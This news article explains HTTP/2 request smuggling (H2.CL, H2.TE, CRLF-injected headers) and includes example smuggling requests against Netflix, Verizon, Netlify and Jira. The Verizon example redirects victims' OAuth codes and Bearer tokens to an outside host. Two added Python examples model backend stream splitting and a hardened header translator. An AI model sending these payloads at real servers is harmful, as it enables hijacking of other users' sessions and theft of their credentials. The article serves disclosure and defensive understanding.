A new attack on HTTP/2 frontends that allows wedging into other users' requests

Web systems whose frontend accepts connections over HTTP/2 and forwards them to a backend over HTTP/1.1 are exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted client requests, an attacker can wedge into the content of other users' requests that are processed over the same connection between the frontend and the backend. The attack can be used to inject malicious JavaScript code into a session with a legitimate site, bypass access control systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are relayed in a frontend-backend scheme. The author of the study demonstrated attacks on the systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian and received 56 thousand dollars through bug bounty programs for identifying the vulnerabilities. The problem has also been confirmed in F5 Networks products. It partially affects mod_proxy in the Apache HTTP server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers simultaneously was blocked in the latest release (1.21.1). Attack tools have already been added to the Burp toolkit and are available as the Turbo Intruder extension.

The principle behind the new method of wedging into traffic is similar to the vulnerability identified by the same researcher two years ago, which, however, was limited to frontends accepting requests over HTTP/1.1. Recall that in the frontend-backend scheme client requests are received by an additional node, the frontend, which establishes a long-lived TCP connection to the backend that actually processes the requests. Requests from different users are usually passed over this shared connection one after another, and the boundary between them is determined by the HTTP protocol itself (the Content-Length header or chunked encoding).

The classic "HTTP Request Smuggling" attack relied on the frontend and backend interpreting the HTTP headers "Content-Length" (which states the size of the request body) and "Transfer-Encoding: chunked" (which allows the body to be sent in pieces) differently. For example, if the frontend supports only "Content-Length" and ignores "Transfer-Encoding: chunked", an attacker can send a request containing both headers, with a "Content-Length" value that does not match the length of the chunked body. The frontend then processes and forwards the request according to "Content-Length", while the backend waits for the chunked body to finish according to "Transfer-Encoding: chunked", so the leftover tail of the attacker's request becomes the beginning of the next request on the connection, which belongs to someone else.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol that operates on frames of explicitly stated size. The request line is carried as pseudo-headers (:method, :path, :authority) alongside the ordinary header fields. When the backend is reached over HTTP/1.1, the frontend translates these into an HTTP/1.1 request line and HTTP/1.1 headers. The problem is that the backend decides how to delimit the stream based on the HTTP headers emitted by the frontend, with no knowledge of the framing of the original request.

In particular, "content-length" and "transfer-encoding" values can be sent as header fields of an HTTP/2 request even though HTTP/2 does not rely on them, since the size of all data is given by the framing. During translation of the HTTP/2 request into HTTP/1.1, however, these headers are passed through and can confuse the backend. There are two main attack variants, H2.TE and H2.CL, in which the backend is misled by a smuggled transfer-encoding header or by a content-length value that does not match the actual size of the request body the frontend received over HTTP/2.


An example of the H2.CL attack is stating an incorrect size in the content-length header of an HTTP/2 request sent to Netflix. The frontend turned it into an identical Content-Length header on the HTTP/1.1 request to the backend, but because the Content-Length value is smaller than the real body size, the trailing part of the data is processed as the beginning of the next request.

For example, the HTTP/2 request

    :method POST
    :path /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

results in the following request being sent to the backend:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length is 4, the backend accepts only "abcd" as the request body, and the remaining "GET /n HTTP/1.1..." is processed as the beginning of the next request, which belongs to another user. The connection is thus desynchronised, and the next request on it receives the response to the dummy request. In the case of Netflix, specifying a third-party host in the "Host:" header of the dummy request made the backend return a "Location: https://02.rs?x.netflix.com/n" redirect to the client, which allowed arbitrary content to be delivered to the client, including running attacker-supplied JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves smuggling a "Transfer-Encoding: chunked" header. The transfer-encoding header is prohibited in HTTP/2 by the specification (it is connection-specific), and requests containing it are supposed to be treated as malformed. Nevertheless, some frontend implementations ignore this requirement, accept transfer-encoding in an HTTP/2 request and translate it into the equivalent HTTP/1.1 header. When a "Transfer-Encoding" header is present, the backend may give it priority and parse the data in "chunked" mode as blocks of varying size in the form "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the total size the frontend determined.

The existence of such a gap was demonstrated on Verizon. The problem concerned the authentication portal and content management system that is also used on sites such as Huffington Post and Engadget. For example, the client request over HTTP/2

    :method POST
    :path /identitfy/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

was sent to the backend as the following HTTP/1.1 request:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The backend ignored the "Content-Length" header and split the stream according to "Transfer-Encoding: chunked". In practice the attack made it possible to redirect users' requests to the attacker's site, including intercepting requests related to OAuth authentication, whose parameters appeared in the Referer header, and to imitate an authentication session so that the user's system sent its credentials to the attacker's host:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1GiCI1sIkInR6…
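The following is an added example (not code from the article or from the research it reports) that models how an HTTP/1.1 backend delimits the requests on a shared connection, and replays the translated Netflix (H2.CL) and Verizon (H2.TE) requests quoted above through it. The victim requests placed after them on the connection are constructed for illustration, and prefer_te is a hypothetical switch for whether the backend lets Transfer-Encoding override Content-Length.

```python
# Added example, not code from the article or the research it reports: a
# minimal model of how an HTTP/1.1 backend splits the byte stream it receives
# from a frontend into requests. The attacker requests are the backend-side
# (already translated) requests quoted in the article; the victim requests
# that follow them on the connection are constructed for illustration.

CRLF = b"\r\n"


def parse_head(head):
    """Return (request line, header dict) with lower-cased header names.

    The first occurrence of a repeated header wins here. Real servers differ
    on this, which is exactly the kind of disagreement smuggling exploits.
    """
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers


def read_chunked(data):
    """Decode a chunked body at the start of data; return (body, bytes consumed)."""
    pos, body = 0, b""
    while True:
        line_end = data.index(CRLF, pos)
        size = int(data[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            # the last chunk is followed by an (empty) trailer section and a final CRLF
            return body, data.index(CRLF, pos) + 2
        body += data[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def split_requests(stream, prefer_te=True):
    """Split a backend-side stream into (request line, headers, body) tuples.

    prefer_te=True models a backend that, as RFC 7230 requires, lets
    Transfer-Encoding: chunked override Content-Length; prefer_te=False
    models a backend that trusts Content-Length only.
    """
    requests, pos = [], 0
    while pos < len(stream):
        try:
            head_end = stream.index(CRLF + CRLF, pos)
        except ValueError:
            # incomplete request: a real backend would block here until the
            # next client's bytes arrive and complete it
            requests.append((b"<incomplete>", {}, stream[pos:]))
            break
        request_line, headers = parse_head(stream[pos:head_end])
        pos = head_end + 4
        if prefer_te and headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, used = read_chunked(stream[pos:])
            pos += used
        else:
            length = int(headers.get(b"content-length", b"0"))
            body = stream[pos:pos + length]
            pos += length
        requests.append((request_line, headers, body))
    return requests


# H2.CL: the Netflix request after the frontend translated it to HTTP/1.1.
# Content-Length: 4 covers only "abcd"; the rest stays in the stream.
H2CL_ATTACK = (b"POST /n HTTP/1.1\r\nHost: www.netflix.com\r\nContent-Length: 4\r\n\r\n"
               b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar")
# Constructed victim request that happens to be next on the shared connection.
VICTIM_1 = b"GET /account HTTP/1.1\r\nHost: www.netflix.com\r\nCookie: session=victim\r\n\r\n"

# H2.TE: the Verizon request after translation. Content-Length: 66 is the
# real body size, but the chunked body already ends after "0\r\n\r\n".
H2TE_ATTACK = (b"POST /identity/XUI HTTP/1.1\r\nHost: id.b2b.oath.com\r\n"
               b"Content-Length: 66\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx=")
VICTIM_2 = b"GET /b2blanding/show/oops HTTP/1.1\r\nHost: id.b2b.oath.com\r\n\r\n"


def demo_h2cl():
    """Backend view of the Netflix stream: the victim's request line is swallowed
    into the smuggled request's Foo header, so the victim receives the response
    for GET /n at Host 02.rs?x.netflix.com."""
    return split_requests(H2CL_ATTACK + VICTIM_1)


def demo_h2te(prefer_te=True):
    """Backend view of the Verizon stream. With prefer_te=True the smuggled
    GET /oops absorbs the first bytes of the victim request as its body; with
    prefer_te=False the 66-byte body is consumed whole and nothing leaks."""
    return split_requests(H2TE_ATTACK + VICTIM_2, prefer_te=prefer_te)


if __name__ == "__main__":
    for req in demo_h2cl() + demo_h2te():
        print(req[0], req[1], req[2])
```

split_requests models only the delimiting logic, not a full HTTP parser; the point it makes is that the same bytes yield two different request sequences depending on which length header the backend trusts, and that the attacker's leftover bytes sit in the buffer until another client's request completes them.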

To attack HTTP/2 implementations that do not allow transfer-encoding to be specified, another method was proposed: the "Transfer-Encoding" header is appended to another header field, separated from it by a newline (on translation to HTTP/1.1 this yields two separate HTTP headers).

For example, Atlassian Jira and Netlify CDN (which served the Mozilla start page used in Firefox) turned out to be affected by this problem. In particular, the HTTP/2 request

    :method POST
    :path /
    :authority start.mozilla.org
    foo b\r\n
    transfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

resulted in the following HTTP/1.1 request being sent to the backend:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another way to smuggle the "Transfer-Encoding" header was to attach it to the name of another header field or to the pseudo-header carrying the request method. For example, when accessing Atlassian Jira, a header named "foo: bar\r\ntransfer-encoding" with the value "chunked" produced the HTTP headers "foo: bar" and "transfer-encoding: chunked", and giving the ":method" pseudo-header the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" was translated into "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
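As an added example (not code from the article or from any of the affected products), the following contrasts a naive HTTP/2-to-HTTP/1.1 header translation of the kind described above with a hardened one that rejects the inputs behind H2.CL, H2.TE and the CRLF-in-header variants. The request cases are constructed after the article's examples; the authority start.mozilla.org is reused for all of them and the function names are illustrative.

```python
# Added example, not code from the article or the affected products: a naive
# HTTP/2-to-HTTP/1.1 translation of the kind the article describes, beside a
# hardened version. The cases are constructed after the article's examples.
import re

CRLF = b"\r\n"

# Connection-specific fields that RFC 7540 section 8.1.2.2 forbids in HTTP/2
# requests; a frontend must never copy them onto the HTTP/1.1 connection.
HOP_BY_HOP = {b"transfer-encoding", b"connection", b"keep-alive", b"upgrade"}
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")  # RFC 7230 token


class BadRequest(ValueError):
    """Raised by the hardened translator for a request that must not be forwarded."""


def naive_translate(pseudo, headers, body):
    """Flawed translation: paste every field in verbatim.

    A client-supplied content-length is trusted as-is, transfer-encoding is
    passed through, and CR/LF inside names or values becomes extra lines.
    """
    lines = [pseudo[b":method"] + b" " + pseudo[b":path"] + b" HTTP/1.1",
             b"Host: " + pseudo[b":authority"]]
    lines += [name + b": " + value for name, value in headers]
    if not any(name.lower() == b"content-length" for name, _ in headers):
        lines.append(b"Content-Length: %d" % len(body))
    return CRLF.join(lines) + CRLF + CRLF + body


def safe_translate(pseudo, headers, body):
    """Hardened translation: validate every field before building the request."""
    for value in pseudo.values():
        if b"\r" in value or b"\n" in value or b"\0" in value:
            raise BadRequest("control character in pseudo-header")
    if not TOKEN.fullmatch(pseudo[b":method"]):
        raise BadRequest("invalid method")
    clean = []
    for name, value in headers:
        name = name.lower()
        if not TOKEN.fullmatch(name):
            raise BadRequest("invalid header name %r" % name)
        if b"\r" in value or b"\n" in value or b"\0" in value:
            raise BadRequest("control character in header value")
        if name in HOP_BY_HOP:
            raise BadRequest("connection-specific header %r" % name)
        if name == b"content-length":
            if not value.isdigit() or int(value) != len(body):
                raise BadRequest("content-length does not match the body")
            continue  # re-derived from the real body length in naive_translate
        clean.append((name, value))
    return naive_translate(pseudo, clean, body)


# Constructed cases modelled on the article's examples (authority reused).
PSEUDO = {b":method": b"POST", b":path": b"/", b":authority": b"start.mozilla.org"}
CASES = {
    "clean": (PSEUDO, [(b"foo", b"bar")], b"x="),
    # H2.TE, Verizon style: transfer-encoding sent as an HTTP/2 header field
    "h2.te": (PSEUDO, [(b"transfer-encoding", b"chunked")],
              b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\n\r\n"),
    # H2.CL, Netflix style: content-length smaller than the real body
    "h2.cl": (PSEUDO, [(b"content-length", b"4")],
              b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar"),
    # Netlify style: CRLF inside a header value
    "value-crlf": (PSEUDO, [(b"foo", b"b\r\ntransfer-encoding: chunked")],
                   b"0\r\n\r\nGET / HTTP/1.1\r\nHost: evil-netlify-domain\r\nContent-Length: 5\r\n\r\nx="),
    # Jira style: CRLF inside a header name
    "name-crlf": (PSEUDO, [(b"foo: bar\r\ntransfer-encoding", b"chunked")], b"0\r\n\r\n"),
    # Jira style: CRLF inside the :method pseudo-header
    "method-crlf": ({**PSEUDO, b":method": b"GET / HTTP/1.1\r\nTransfer-encoding: chunked"},
                    [], b"0\r\n\r\n"),
}


def smuggles_te(raw):
    """True if a translated request carries a Transfer-Encoding: chunked line."""
    return b"\r\ntransfer-encoding: chunked" in raw.lower()


def evaluate(translate):
    """Map each case to 'forwarded' or 'rejected' for the given translator."""
    results = {}
    for name, (pseudo, headers, body) in CASES.items():
        try:
            translate(pseudo, headers, body)
            results[name] = "forwarded"
        except BadRequest:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    print("naive:", evaluate(naive_translate))
    print("safe: ", evaluate(safe_translate))
```

The hardened version rejects rather than silently drops, which matches how the HTTP/2 specification tells a frontend to treat connection-specific fields; the one value it rewrites is Content-Length, which is always recomputed from the body the frontend actually received so the backend can never see a length the client chose.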

The researcher who identified the problem also proposed a request tunnelling technique for attacking frontends in which each client IP address gets its own connection to the backend, so traffic from different users is not mixed. This technique does not allow wedging into other users' requests, but it makes it possible to poison a shared cache, which affects the processing of other requests, and to replace internal HTTP headers used to pass service information from the frontend to the backend (for example, when authentication is performed on the frontend, such headers can convey information about the current user to the backend). As a practical application of the method, cache poisoning made it possible to take control of pages of the Bitbucket service.

Source: opennet.ru
